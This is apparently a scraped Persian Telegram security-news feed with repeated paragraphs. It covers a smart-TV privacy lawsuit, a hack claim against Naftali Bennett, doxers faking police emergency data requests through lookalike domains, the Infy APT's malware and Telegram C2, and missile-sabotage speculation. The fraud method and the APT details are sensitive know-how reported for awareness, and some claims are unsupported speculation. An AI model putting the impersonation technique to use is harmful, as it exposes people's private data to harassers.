در این شکایت ادعا شده که استفاده از این فناوری نقض قوانین ایالتی است و خواستار ۱۰ هزار دلار جریمه برای هر تخلف و ۲۵۰ هزار دلار جریمه برای هر تخلفی که کاربران بالای ۶۵ سال رو تحت تأثیر قرار داده، شده.
علاوه بر این، پکستون همسو با فضای سیاسی حاکم در آمریکا و جهان، به این موضوع اشاره کرده که TCL و Hisense شرکتهای چینی هستن و ادعا کرده که استفاده از فناوری ACR میتونه به دولت چین امکان دسترسی به اطلاعات حساس شهروندان آمریکایی رو بده.
علاوه بر این، در شکایت اومده که حتی غیرفعال کردن ACR هم عمدا پیچیده طراحی شده. مثلا در تلویزیونهای سامسونگ، این گزینه در بیش از ۴ منوی جداگانه پخش شده و نیاز به بیش از ۱۵ کلیک داره، در حالیکه فعالسازی ACR تنها با یک کلیک انجام میشه.
#تلویزیون_هوشمند #آمریکا
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
دادستان کل ایالت تگزاس، کن پکستون، اعلام کرده که علیه ۵ شرکت از بزرگترین سازندگان تلویزیون در جهان شکایت حقوقی ثبت کرده: سامسونگ، سونی، الجی، هایسنس و TCL.
به گفته ایشون، تمام این شرکتها از طریق فناوری بنام Automated Content Recognition (ACR) یا تشخیص خودکار محتوا، اقدام به جمعآوری اطلاعات کاربران میکنن.
طبق ادعای پکستون، این فناوری قادر هر ۵۰۰ میلیثانیه از محتوایی که کاربر در حال تماشاست اسکرینشات بگیره و این اطلاعات رو بدون رضایت کاربر برای شرکت سازنده ارسال کنه. شرکتهای سازنده تلویزیون این اطلاعات رو میفروشن یا از اونا برای نمایش تبلیغات هدفمند و شخصیسازیشده استفاده میکنن.
ایشون همچنین مدعی شده که از نظر فنی، این فناوری امنیت اطلاعات خصوصی کاربران رو به خطر میندازه. چون ممکنه از پسوردها، اطلاعات بانکی و سایر دادههای حساس کاربران هم اسکرینشات بگیرن.
در این شکایت ادعا شده که استفاده از این فناوری نقض قوانین ایالتی است و خواستار ۱۰ هزار دلار جریمه برای هر تخلف و ۲۵۰ هزار دلار جریمه برای هر تخلفی که کاربران بالای ۶۵ سال رو تحت تأثیر قرار داده، شده.
علاوه بر این، پکستون همسو با فضای سیاسی حاکم در آمریکا و جهان، به این موضوع اشاره کرده که TCL و Hisense شرکتهای چینی هستن و ادعا کرده که استفاده از فناوری ACR میتونه به دولت چین امکان دسترسی به اطلاعات حساس شهروندان آمریکایی رو بده.
علاوه بر این، در شکایت اومده که حتی غیرفعال کردن ACR هم عمدا پیچیده طراحی شده. مثلا در تلویزیونهای سامسونگ، این گزینه در بیش از ۴ منوی جداگانه پخش شده و نیاز به بیش از ۱۵ کلیک داره، در حالیکه فعالسازی ACR تنها با یک کلیک انجام میشه.
#تلویزیون_هوشمند #آمریکا
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤7
OnHex
🔴 گروه هکری حنظله، مدعی هک گوشی iPhone 13، نفتالی بنت نخست وزیر اسبق اسرائیل شده و برای این ادعاش، یسری چت، شماره تلفن، ویدیو و ... منتشر کرده. دفتر نفتالی بنت در پاسخ اعلام کرده: این موضوع توسط سازمانهای امنیتی و سایبری مربوطه در حال رسیدگی است. این دستگاه…
🔴 دفتر نفتالی بنت عصر امروزبیانیهای رسمی صادر کرد که ادعاهای گروه هکرهای ایرانی حنظله مبنی بر هک شدن دستگاه شخصی اون رو قاطعانه رد میکنه.
در بیانیهای از سوی این دفتر اومده: پس از بررسی های انجام شده، به نظر میرسه که تلفن نخستوزیر سابق نفتالی بنت هک نشده.
طبق برآوردهای حرفهای، اطلاعاتی که به صورت آنلاین منتشر شده، که شامل لیست مخاطبین، عکسهای خانوادگی و اسناد سیاسی است، به احتمال زیاد از هک شدن دستگاه یکی از نزدیکان بنت یا یکی از اعضای کارکنان او سرچشمه گرفته و نه دستگاه امنی که اون شخصاً ازش استفاده میکنه.
گروه هکری حنظله هم در پاسخ به این تکذیبیه، چتهایی رو منتشر میکنه که ظاهرا از تلگرام نفتالی بنت گرفته شده.
#اخبار_سایبری_جنگ_ایران_اسرائیل #حنظله
#Handala
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
در بیانیهای از سوی این دفتر اومده: پس از بررسی های انجام شده، به نظر میرسه که تلفن نخستوزیر سابق نفتالی بنت هک نشده.
طبق برآوردهای حرفهای، اطلاعاتی که به صورت آنلاین منتشر شده، که شامل لیست مخاطبین، عکسهای خانوادگی و اسناد سیاسی است، به احتمال زیاد از هک شدن دستگاه یکی از نزدیکان بنت یا یکی از اعضای کارکنان او سرچشمه گرفته و نه دستگاه امنی که اون شخصاً ازش استفاده میکنه.
گروه هکری حنظله هم در پاسخ به این تکذیبیه، چتهایی رو منتشر میکنه که ظاهرا از تلگرام نفتالی بنت گرفته شده.
#اخبار_سایبری_جنگ_ایران_اسرائیل #حنظله
#Handala
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤18
🔴 نشریه wired گزارشی منتشر کرده در خصوص یک سرویس Doxing-as-a-Service، که خودشون رو جای پلیس جا می زنن و اطلاعات افراد رو از شرکتهای مختلف میگیرن.
بصورت کلی داکسینگ یعنی اطلاعات شخصی یک نفر رو بدون رضایتش جمع آوری و منتشر کنید. معمولا با هدف آزار، تهدید، بی اعتبار کردن یا ایجاد خطر واقعی و با انگیزه حسادت، انتقام شخصی، اختلافات آنلاین، سیاسی، پول و ... انجام میگیره .
در این مقاله با فردی بنام Exempt صحبت کردن که عضو این سرویس داکسینگ بوده.
در آمریکا، نهادهای فدرال، ایالتی و محلی اجرای قانون برای شناسایی صاحب یک حساب شبکه اجتماعی یا اطلاعات مربوط به یک تلفن، برای شرکت مربوطه احضاریه یا حکم قضایی ارسال میکنن.
تمام شرکتهای بزرگ فعال در آمریکا، بخشها و کارکنان ویژهای برای رسیدگی به این درخواستها دارن که معمولاً از طریق ایمیل ارسال میشه. شرکتها پس از بررسی احضاریه و اطمینان ظاهری از اینکه از سوی یک نهاد اجرای قانون اومده، اغلب همکاری میکنن و گاهی برای تأیید بیشتر با افسر مربوطه تماس میگیرن.
اما افسران میتونن در شرایط تهدید فوری جان یا آسیب جدی، درخواست اضطراری داده (EDR) ارسال کنن. این درخواستها معمولاً مراحل تأیید اضافی رو دور میزنن، چون شرکتها تحت فشار هستن تا هرچه سریعتر پاسخ بدن.
از طرفی حدود ۱۸ هزار نهاد اجرای قانون در آمریکا وجود داره که هرکدام از الگوهای نامگذاری ایمیل و دامنههای مختلف (us، net، org، gov، com) استفاده میکنن.
هکرها از این موارد سوء استفاده میکنن و از طریق مهندسی اجتماعی یا اطلاعات سرقت شده، به ایمیل واقعی پلیس نفوذ میکنن یا دامنه هایی شبیه این نهادها می سازنن و اینجوری خودشون رو جای پلیس جا میزنن و درخواست گرفتن اطلاعات رو به شرکتهای مختلف ارسال میکنن.
مثلا برای اینکه اطلاعاتی رو در خصوص فردی، از شرکت Charter Communications بگیرن، دامنه ی jaxsheriff[.]us رو خریدن و خودشون رو جای یکی از افسرهای پلیس جکسونویل جا زدن. (دامنه ی اصلی پلیس jaxsheriff.org بوده).
در برخی موارد برخی افسران هم در ازای دریافت سهمی، درخواستهارو از حساب رسمی خودشون ارسال میکردن.
طبق ادعای Exempt، در ماه آگوست بیش از 18هزار دلار درآمد و طی سالهای اخیر بیش از 500 درخواست موفق داشتن.
علاوه بر Charter Communications، شرکتهایی مانند اپل و آمازون و Rumble هم قربانی این تکنیک بودن.
مت داناهیو، مأمور سابق FBI و بنیانگذار شرکت Kodex گفته: مشکل اصلی بیدقتی شرکتها نیست، بلکه اینِ که ایمیل اساسا برای این سطح از احراز هویت و تصمیمگیری فوری طراحی نشده./ منبع
#داکسینگ
#Doxing
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
بصورت کلی داکسینگ یعنی اطلاعات شخصی یک نفر رو بدون رضایتش جمع آوری و منتشر کنید. معمولا با هدف آزار، تهدید، بی اعتبار کردن یا ایجاد خطر واقعی و با انگیزه حسادت، انتقام شخصی، اختلافات آنلاین، سیاسی، پول و ... انجام میگیره .
در این مقاله با فردی بنام Exempt صحبت کردن که عضو این سرویس داکسینگ بوده.
در آمریکا، نهادهای فدرال، ایالتی و محلی اجرای قانون برای شناسایی صاحب یک حساب شبکه اجتماعی یا اطلاعات مربوط به یک تلفن، برای شرکت مربوطه احضاریه یا حکم قضایی ارسال میکنن.
تمام شرکتهای بزرگ فعال در آمریکا، بخشها و کارکنان ویژهای برای رسیدگی به این درخواستها دارن که معمولاً از طریق ایمیل ارسال میشه. شرکتها پس از بررسی احضاریه و اطمینان ظاهری از اینکه از سوی یک نهاد اجرای قانون اومده، اغلب همکاری میکنن و گاهی برای تأیید بیشتر با افسر مربوطه تماس میگیرن.
اما افسران میتونن در شرایط تهدید فوری جان یا آسیب جدی، درخواست اضطراری داده (EDR) ارسال کنن. این درخواستها معمولاً مراحل تأیید اضافی رو دور میزنن، چون شرکتها تحت فشار هستن تا هرچه سریعتر پاسخ بدن.
از طرفی حدود ۱۸ هزار نهاد اجرای قانون در آمریکا وجود داره که هرکدام از الگوهای نامگذاری ایمیل و دامنههای مختلف (us، net، org، gov، com) استفاده میکنن.
هکرها از این موارد سوء استفاده میکنن و از طریق مهندسی اجتماعی یا اطلاعات سرقت شده، به ایمیل واقعی پلیس نفوذ میکنن یا دامنه هایی شبیه این نهادها می سازنن و اینجوری خودشون رو جای پلیس جا میزنن و درخواست گرفتن اطلاعات رو به شرکتهای مختلف ارسال میکنن.
مثلا برای اینکه اطلاعاتی رو در خصوص فردی، از شرکت Charter Communications بگیرن، دامنه ی jaxsheriff[.]us رو خریدن و خودشون رو جای یکی از افسرهای پلیس جکسونویل جا زدن. (دامنه ی اصلی پلیس jaxsheriff.org بوده).
در برخی موارد برخی افسران هم در ازای دریافت سهمی، درخواستهارو از حساب رسمی خودشون ارسال میکردن.
طبق ادعای Exempt، در ماه آگوست بیش از 18هزار دلار درآمد و طی سالهای اخیر بیش از 500 درخواست موفق داشتن.
علاوه بر Charter Communications، شرکتهایی مانند اپل و آمازون و Rumble هم قربانی این تکنیک بودن.
مت داناهیو، مأمور سابق FBI و بنیانگذار شرکت Kodex گفته: مشکل اصلی بیدقتی شرکتها نیست، بلکه اینِ که ایمیل اساسا برای این سطح از احراز هویت و تصمیمگیری فوری طراحی نشده./ منبع
#داکسینگ
#Doxing
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
WIRED
Doxers Posing as Cops Are Tricking Big Tech Firms Into Sharing People’s Private Data
A spoofed email address and an easily faked document is all it takes for major tech companies to hand over your most personal information.
❤6
OnHex
🔴 دوره رایگان بررسی ساختار فایلهای PE (Portable Executable) بعد از ارائه ی دو فصل از دوره رایگان مهندسی معکوس نرم افزار، دوره ی رایگان جدیدی با عنوان "بررسی ساختار فایلهای PE (Portable Executable)" رو، شروع کردیم. هدف این دوره آشنایی عملی و قدم به قدم با…
🔴 قسمت دوازدهم: Sectionها
در این قسمت رفتیم سراغ معرفی Sectionها در فایلهای PE. سکشن های استاندارد رو معرفی کردیم. نحوه ی تغییر نام سکشن کد، text. رو آموزش دادیم. همچنین ارتباط DataDirectoryها در Optional Header رو با Sectionها، بررسی کردیم. در ادامه اطلاعات مفید Datadirectoryها رو به PE Parser اضافه کردیم و در نهایت Sectionها رو در x64dbg بررسی کردیم.
🟢 مشاهده از یوتیوب
🔵 اسلایدها و کدها
👈 قسمت های قبلی: 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11
سایت دوره | اسلایدهای دوره | پلی لیست یوتیوب | پلی لیست دوره رایگان مهندسی معکوس نرم افزار (فصل اول - فصل دوم) | پلی لیست استفاده از AI در امنیت سایبری
#دورهPE #ویندوز_اینترنالز #تیم_قرمز #تیم_آبی
#PE #PortableExecutable #PEBear #WindowsInternals #redteam #Blueteam #PEParser #x64dbg #Lief #Sections
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
در این قسمت رفتیم سراغ معرفی Sectionها در فایلهای PE. سکشن های استاندارد رو معرفی کردیم. نحوه ی تغییر نام سکشن کد، text. رو آموزش دادیم. همچنین ارتباط DataDirectoryها در Optional Header رو با Sectionها، بررسی کردیم. در ادامه اطلاعات مفید Datadirectoryها رو به PE Parser اضافه کردیم و در نهایت Sectionها رو در x64dbg بررسی کردیم.
🟢 مشاهده از یوتیوب
🔵 اسلایدها و کدها
👈 قسمت های قبلی: 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11
سایت دوره | اسلایدهای دوره | پلی لیست یوتیوب | پلی لیست دوره رایگان مهندسی معکوس نرم افزار (فصل اول - فصل دوم) | پلی لیست استفاده از AI در امنیت سایبری
#دورهPE #ویندوز_اینترنالز #تیم_قرمز #تیم_آبی
#PE #PortableExecutable #PEBear #WindowsInternals #redteam #Blueteam #PEParser #x64dbg #Lief #Sections
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤5
🔴 عنوان برنامه ی Off By One Security این هفته: "Machine Identity & Attack Path: The Danger of Misconfigurations" هستش.
مهمان برنامه: Filipi Pires
این برنامه ساعت 30 : 22 به وقت ایران از طریق توییتر و یوتیوب قابل دسترس هستش و ضبط هم میشه.
در این برنامه بررسی میکنن که چطوری مهاجمین با سوء استفاده از کنترلهای ضعیف هویت ماشینها و پیکربندیهای نادرست در فضای ابری، مسیرهای حملهی مخفی و پیچیدهای رو در محیطهای سازمانی ایجاد میکنن.
بصورت کلی قراره، بردارهای حملهی واقعی، سطوح حمله و مسیرهای نفوذ رو بصورت عملی آنالیز کنن و بینشهای قابل اجرا برای هاردنینگ زیرساختهای ابری ارائه بدن. این کار رو با تمرکز بر ابزارهای متنبازی مانند Cartography، AWSPX و ... انجام میدن.
در این برنامه یاد میگیرید که:
- ساختار محیطهای ابری رو ترسیم کنید.
- روابط و مجوزهای IAM (Identity and Access Management) رو بصورت بصری مشاهده کنید.
- ابزارهای امنیتی خودتون رو تقویت کنید.
این برنامه برای متخصصان امنیت سایبری، معماران Cloud و مدیران IT طراحی شده و استراتژیهای عملی برای دفاع از اکوسیستمهای چندابری مدرن در برابر تهدیدات پیچیده و پیشرفته رو ارائه میده.
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
مهمان برنامه: Filipi Pires
این برنامه ساعت 30 : 22 به وقت ایران از طریق توییتر و یوتیوب قابل دسترس هستش و ضبط هم میشه.
در این برنامه بررسی میکنن که چطوری مهاجمین با سوء استفاده از کنترلهای ضعیف هویت ماشینها و پیکربندیهای نادرست در فضای ابری، مسیرهای حملهی مخفی و پیچیدهای رو در محیطهای سازمانی ایجاد میکنن.
بصورت کلی قراره، بردارهای حملهی واقعی، سطوح حمله و مسیرهای نفوذ رو بصورت عملی آنالیز کنن و بینشهای قابل اجرا برای هاردنینگ زیرساختهای ابری ارائه بدن. این کار رو با تمرکز بر ابزارهای متنبازی مانند Cartography، AWSPX و ... انجام میدن.
در این برنامه یاد میگیرید که:
- ساختار محیطهای ابری رو ترسیم کنید.
- روابط و مجوزهای IAM (Identity and Access Management) رو بصورت بصری مشاهده کنید.
- ابزارهای امنیتی خودتون رو تقویت کنید.
این برنامه برای متخصصان امنیت سایبری، معماران Cloud و مدیران IT طراحی شده و استراتژیهای عملی برای دفاع از اکوسیستمهای چندابری مدرن در برابر تهدیدات پیچیده و پیشرفته رو ارائه میده.
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
YouTube
Machine Identity & Attack Path: The Danger of Misconfigurations!
Join us with Filipi Pires!
In an era where digital transformation has pushed multi-cloud environments to the core of business operations, security risks have scaled just as fast. “Machine Identity & Attack Path: The Danger of Misconfigurations” dives into…
In an era where digital transformation has pushed multi-cloud environments to the core of business operations, security risks have scaled just as fast. “Machine Identity & Attack Path: The Danger of Misconfigurations” dives into…
❤6
OnHex
🔴 چین روز یکشنبه آمریکا و NSA رو متهم کرده که یک حمله ی سایبری از پیش برنامه ریزی شده علیه National Time Service Center (NTSC) انجام دادن و آمریکا رو امپراتوری هکرها و بزرگترین منبع آشوب در فضای سایبری نامیده. وزارت امنیت دولتی چین (MSS) در پستی در وی…
🔴 سازمان اطلاعات وزارت امنیت دولتی چین در ماه اکتبر فاش کرد که NSA، طی یک کمپین سایبری سه ساله در تلاش بوده به مرکز ملی خدمات زمان رسمی چین (NTSC) نفوذ کنه.
طبق گزارش رسانههای دولتی، این مرکز خدمات زمانبندی بسیار دقیقی ارائه میده که برای سامانههای نظامی، ارتباطات، امور مالی، برق، حملونقل و نقشهبرداری حیاتی است.
آژانس NSA، در این خصوص اظهار نظری نکرد،اما تحلیلگران دفاعی میگن گزارش چین سرنخ مهمی از یکی از محرمانهترین برنامههای پیشرفته در دفاع راهبردی موشکی آمریکا به نام پیش از پرتاب (Left of Launch) رو ارائه میده.
وقتی یک موشکی شلیک میشه، برای دفاع در برابرش باید شناسایی، رهگیری و منهدم بشه. این روند هم نیاز به زمان زیادی داره، هم هزینه بر هستش و هم ممکنه ریسک بالایی داشته باشه. بنابراین اگه روشی وجود داشته باشه که موشک قبل از پرتاب، منهدم بشه، منجر به کاهش هزینه، خسارات و ... میشه.
پیش از پرتاب به بازهی زمانی اشاره داره که در اون از ابزارهای مختلف نظامی استفاده میشه، از جمله حملات سایبری که میتونن باعث انفجار موشکها در سیلوها در لحظه ی فشردن دکمه ی شلیک بشن، عملیات نیروهای ویژه و خرابکاری میدانی پس از آنکه مشخص بشه یک موشک در حال آمادهسازی برای پرتاب است.
پروژه ی انجام حملات و خرابکاریهای پیش از پرتاب علیه سامانههای موشکی حداقل از یک دهه پیش آغاز شده و اجزای آن جزو به شدت محرمانهترین اسرار ارتش آمریکا به شمار میره.
نکته ای که وجود داره برای عملیات پیش از پرتاب، بدلیل فاصله ی زیاد و احتمال تشدید تنشها، بهترین گزینه استفاده از ابزارهای غیرفیزیکی (Non-kinetic operations) مانند حملات سایبری هستش.
دسترسی به NTSC میتونه در زمان درگیری، برتری بزرگی برای ارتش و نهادهای اطلاعاتی آمریکا ایجاد کنه، چون به هکرها اجازه میده حملات موشکی رو پیش از پرتاب یا اندکی پس از پرتاب، در مرحلهای موسوم به مرحله ی بوست، مختل کنن.
این مرکز زمان یکی از عناصر کلیدی سامانه ی ناوبری ماهوارهای BeiDou چین است؛ نسخهای مشابه GPS آمریکا که با بیش از ۳۵ ماهواره، دادههای حیاتی موقعیتیابی، ناوبری و زمانبندی (PNT) رو در اختیار سامانههای موشکی چین قرار میده. گفته میشه این سامانه دقتی در حد سانتیمتر فراهم میکنه و به NTSC متصل است.
از نظر تئوری، NSA با نفوذ به این مرکز میتونست بدافزاری رو در زنجیره ی دادههای PNT مستقر کنه که هم برای جمعآوری اطلاعات درباره ی اهداف موشکی و هم برای ارسال پارامترهای مسیریابی جعلی به موشکها مورد استفاده قرار بگیره.
فناوری پیشرفته ی هوش مصنوعی آمریکا هم میتونه اختلالات پیش از پرتابی ایجاد کنه که حتی مسیر موشکهای چینی رو طوری تغییر بده که به سمت پکن هدفگیری بشن.
برای سامانههای موشکی، PNT یک عنصر اساسی برای تعیین موقعیت لحظهای، جهتیابی و دادههای زمانی دقیق است که برای هدفگیری صحیح، کنترل مسیر و فرماندهی و کنترل استفاده میشه.
فرمان اجرایی ترامپ درباره ی دفاع موشکی که در ماه ژانویه امضا شد، بطور مشخص خواستار توسعه و استقرار قابلیتهای پیش از پرتاب برای گنبد طلایی است.
سامانه های دفاع موشکی قادر به هشدار و ردیابی موشکهای بالستیک سنتی هستن و در برابر موشکهای مافوق صوت و مانور پذیر و مدرن، عملکردشون کاهش پیدا میکنه بخصوص وقتی شاهد پرتابهای 2 الی 3 رقمی باشیم. بنابراین عملیات پیش از پرتاب میتونه اهمیت زیادی داشته باشه.
در بخشی از این گزارش اومده که در جنگ 12 روزه، اسرائیل هم از چنین عملیاتی استفاده کرده، البته سایبری نبوده و از طریق انهدام موشک قبل از پرتاب یا از طریق حذف تکنسین ها بوده. / منبع
#ایران #اسرائیل #آمریکا #چین #پیش_از_پرتاب
#LeftofLaunch
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
طبق گزارش رسانههای دولتی، این مرکز خدمات زمانبندی بسیار دقیقی ارائه میده که برای سامانههای نظامی، ارتباطات، امور مالی، برق، حملونقل و نقشهبرداری حیاتی است.
آژانس NSA، در این خصوص اظهار نظری نکرد،اما تحلیلگران دفاعی میگن گزارش چین سرنخ مهمی از یکی از محرمانهترین برنامههای پیشرفته در دفاع راهبردی موشکی آمریکا به نام پیش از پرتاب (Left of Launch) رو ارائه میده.
وقتی یک موشکی شلیک میشه، برای دفاع در برابرش باید شناسایی، رهگیری و منهدم بشه. این روند هم نیاز به زمان زیادی داره، هم هزینه بر هستش و هم ممکنه ریسک بالایی داشته باشه. بنابراین اگه روشی وجود داشته باشه که موشک قبل از پرتاب، منهدم بشه، منجر به کاهش هزینه، خسارات و ... میشه.
پیش از پرتاب به بازهی زمانی اشاره داره که در اون از ابزارهای مختلف نظامی استفاده میشه، از جمله حملات سایبری که میتونن باعث انفجار موشکها در سیلوها در لحظه ی فشردن دکمه ی شلیک بشن، عملیات نیروهای ویژه و خرابکاری میدانی پس از آنکه مشخص بشه یک موشک در حال آمادهسازی برای پرتاب است.
پروژه ی انجام حملات و خرابکاریهای پیش از پرتاب علیه سامانههای موشکی حداقل از یک دهه پیش آغاز شده و اجزای آن جزو به شدت محرمانهترین اسرار ارتش آمریکا به شمار میره.
نکته ای که وجود داره برای عملیات پیش از پرتاب، بدلیل فاصله ی زیاد و احتمال تشدید تنشها، بهترین گزینه استفاده از ابزارهای غیرفیزیکی (Non-kinetic operations) مانند حملات سایبری هستش.
دسترسی به NTSC میتونه در زمان درگیری، برتری بزرگی برای ارتش و نهادهای اطلاعاتی آمریکا ایجاد کنه، چون به هکرها اجازه میده حملات موشکی رو پیش از پرتاب یا اندکی پس از پرتاب، در مرحلهای موسوم به مرحله ی بوست، مختل کنن.
این مرکز زمان یکی از عناصر کلیدی سامانه ی ناوبری ماهوارهای BeiDou چین است؛ نسخهای مشابه GPS آمریکا که با بیش از ۳۵ ماهواره، دادههای حیاتی موقعیتیابی، ناوبری و زمانبندی (PNT) رو در اختیار سامانههای موشکی چین قرار میده. گفته میشه این سامانه دقتی در حد سانتیمتر فراهم میکنه و به NTSC متصل است.
از نظر تئوری، NSA با نفوذ به این مرکز میتونست بدافزاری رو در زنجیره ی دادههای PNT مستقر کنه که هم برای جمعآوری اطلاعات درباره ی اهداف موشکی و هم برای ارسال پارامترهای مسیریابی جعلی به موشکها مورد استفاده قرار بگیره.
فناوری پیشرفته ی هوش مصنوعی آمریکا هم میتونه اختلالات پیش از پرتابی ایجاد کنه که حتی مسیر موشکهای چینی رو طوری تغییر بده که به سمت پکن هدفگیری بشن.
برای سامانههای موشکی، PNT یک عنصر اساسی برای تعیین موقعیت لحظهای، جهتیابی و دادههای زمانی دقیق است که برای هدفگیری صحیح، کنترل مسیر و فرماندهی و کنترل استفاده میشه.
فرمان اجرایی ترامپ درباره ی دفاع موشکی که در ماه ژانویه امضا شد، بطور مشخص خواستار توسعه و استقرار قابلیتهای پیش از پرتاب برای گنبد طلایی است.
سامانه های دفاع موشکی قادر به هشدار و ردیابی موشکهای بالستیک سنتی هستن و در برابر موشکهای مافوق صوت و مانور پذیر و مدرن، عملکردشون کاهش پیدا میکنه بخصوص وقتی شاهد پرتابهای 2 الی 3 رقمی باشیم. بنابراین عملیات پیش از پرتاب میتونه اهمیت زیادی داشته باشه.
در بخشی از این گزارش اومده که در جنگ 12 روزه، اسرائیل هم از چنین عملیاتی استفاده کرده، البته سایبری نبوده و از طریق انهدام موشک قبل از پرتاب یا از طریق حذف تکنسین ها بوده. / منبع
#ایران #اسرائیل #آمریکا #چین #پیش_از_پرتاب
#LeftofLaunch
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
The Washington Times
Hack of Chinese state time center hints at U.S. advanced missile defense
China's Ministry of State Security intelligence service disclosed in October that the U.S. National Security Agency has been engaged in a three-year cyber campaign to break into the official Nati
❤7
🔴 فراخوان دستیابی به دانش فنی حافظه امن در مرکز داده ابری و واکنش خودکار به تهدیدات با استفاده از هوش مصنوعی
این فراخوان با حمایت صندوق نوآوری و شکوفایی منتشر شده و تا ۱۷ دی ماه ۱۴۰۴ مهلت ارسال پروپوزال رو دارید.
برای کسب کسب اطلاعات بیشتر اینجا رو مشاهده کنید.
علاوه بر این فراخوان، فراخوانهای زیر هم برای اعضای کانال میتونه قابل ارائه باشه:
- دستیابی به دانش فنی تولید چهره تمامرخ از تصاویر زاویهدار (نیمرخ و سهرخ) با استفاده از تکنیکهای هوش مصنوعی
- درایو کنترل سرعت مستقل از مدل موتور با کاربرد در پمپهای درونچاهی
#فراخوان #صندوق_نوآوری_شکوفایی
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
این فراخوان با حمایت صندوق نوآوری و شکوفایی منتشر شده و تا ۱۷ دی ماه ۱۴۰۴ مهلت ارسال پروپوزال رو دارید.
برای کسب کسب اطلاعات بیشتر اینجا رو مشاهده کنید.
علاوه بر این فراخوان، فراخوانهای زیر هم برای اعضای کانال میتونه قابل ارائه باشه:
- دستیابی به دانش فنی تولید چهره تمامرخ از تصاویر زاویهدار (نیمرخ و سهرخ) با استفاده از تکنیکهای هوش مصنوعی
- درایو کنترل سرعت مستقل از مدل موتور با کاربرد در پمپهای درونچاهی
#فراخوان #صندوق_نوآوری_شکوفایی
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
❤4
🔴 محققای SafeBreach گزارشی منتشر کردن در خصوص فعالیتهای اخیر گروه هکری ایرانی Infy که با نام Prince of Persia هم شناخته میشن.
براساس گزارشی که توسط محققای Palo Alto Networks در سال 2016 منتشر شد، گروه Infy یکی از قدیمی ترین APTهای دنیا محسوب میشه بطوریکه فعالیتشون به سال 2004 برمیگرده.
یکی از ویژگی های این گروه این هستش که برخلاف گروههای هکری ایرانی مانند Charming Kitten، MuddyWater و OilRig، بصورت مخفیانه فعالیت میکنن و توجه زیادی رو به خودش جلب نکردن.
این گروه 2 تا ابزار شناخته شده داره:
- بدافزار Foudre: کارش شناسایی و ارزیابی قربانی برای اینکه مشخص بشه، قربانی ارزش حمله رو داره یا نه (Profiler) اگه اوکی بود بعنوان دانلودر، بدافزار مرحله ی دوم رو دانلود و نصب میکنه. این بدافزار معمولا از طریق ایمیل فیشینگ توزیع میشه.
- بدافزار Tonnerre: برای استخراج اطلاعات با ارزش از سیستم قربانی، استفاده میشه.
محققا کمپین جدیدی از این گروه رو شناسایی کردن که قربانیانی در ایران، عراق، ترکیه، هند و کانادا و اروپا داشته. در این حملات از Foudre (version 34) و Tonnerre (versions 12-18, 50) استفاده شده.
قبلا از ماکروهای اکسل برای نصب Foudre استفاده میکردن اما الان فایل اجرایی رو داخل این اسناد قرار میدن.
یکی از برجسته ترین ویژگی های این گروه استفاده از الگوریتم تولید دامنه (DGA) برای مقاوم کردن زیرساخت C2 هستش. همچنین برای بررسی اصالت دامنه، Foudre و Tonnerre، هر روز یک فایل امضای RSA رو دانلود و بصورت محلی مقایسه میکنن. قالب درخواست به این صورت بوده:
در بررسی زیر ساخت C2، یک فولدر key پیدا کردن که برای اعتبارسنجی C2 استفاده میشه. یکسری فولدر دیگه برای لاگ ارتباط و فایلهای استخراج شده، وجود داشته. یک دایرکتوری بنام download هم بوده مشخص نیست برای چیه اما حدس می زنن برای دانلود و ارتقاء نسخه هاست.
آخرین نسخه Tonnerre از یک گروه تلگرامی بعنوان سرور C2 استفاده میکنه که این گروه دو عضو داره: یک بات تلگرام با نام ttestro1bot که احتمالا برای صدور دستورات و جمعآوری داده استفاده میشه و کاربری با شناسه ehsan8999100.
اگرچه استفاده از پیامرسانها برای C2 موضوع جدیدی نیست، اما نکته قابل توجه این که اطلاعات مربوط به این گروه تلگرامی در فایلی به نام tga.adr و در دایرکتوری به نام t در سرور C2 ذخیره شده. شایان ذکر است که دانلود فایل tga.adr فقط برای فهرست مشخصی از GUIDهای قربانی قابل فعالسازی است.
محققای SafeBreach همچنین نسخههای قدیمیتری رو شناسایی کردن که در کمپینهای Foudre بین سالهای ۲۰۱۷ تا ۲۰۲۰ استفاده شدن، از جمله:
- نسخهای از Foudre که در قالب Amaq News Finder مخفی شده بود تا بدافزار رو دانلود و اجرا کنه.
- نسخه جدیدی از یک تروجان بنام MaxPinner که توسط DLL مربوط به Foudre نسخه ۲۴ دانلود و برای جاسوسی از محتوای تلگرام بکار میرفت.
- بدافزاری بنام Deep Freeze که مشابه Amaq News Finder است و برای آلودهسازی قربانیان به Foudre استفاده میشد.
- یک بدافزار ناشناخته با نام Rugissement
محققای SafeBreach گفتن: با وجود اینکه به نظر میرسید این گروه در سال ۲۰۲۲ ناپدید شده، بازیگران تهدید Prince of Persia دقیقا برعکس عمل کردن. تحقیقات ما اطلاعات حیاتی در خصوص فعالیتهای این گروه در سه سال گذشته رو ارائه میده.
#بازیگران_تهدید #ایران
#APT #SafeBreach #PrinceofPersia #Infy
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
براساس گزارشی که توسط محققای Palo Alto Networks در سال 2016 منتشر شد، گروه Infy یکی از قدیمی ترین APTهای دنیا محسوب میشه بطوریکه فعالیتشون به سال 2004 برمیگرده.
یکی از ویژگی های این گروه این هستش که برخلاف گروههای هکری ایرانی مانند Charming Kitten، MuddyWater و OilRig، بصورت مخفیانه فعالیت میکنن و توجه زیادی رو به خودش جلب نکردن.
این گروه 2 تا ابزار شناخته شده داره:
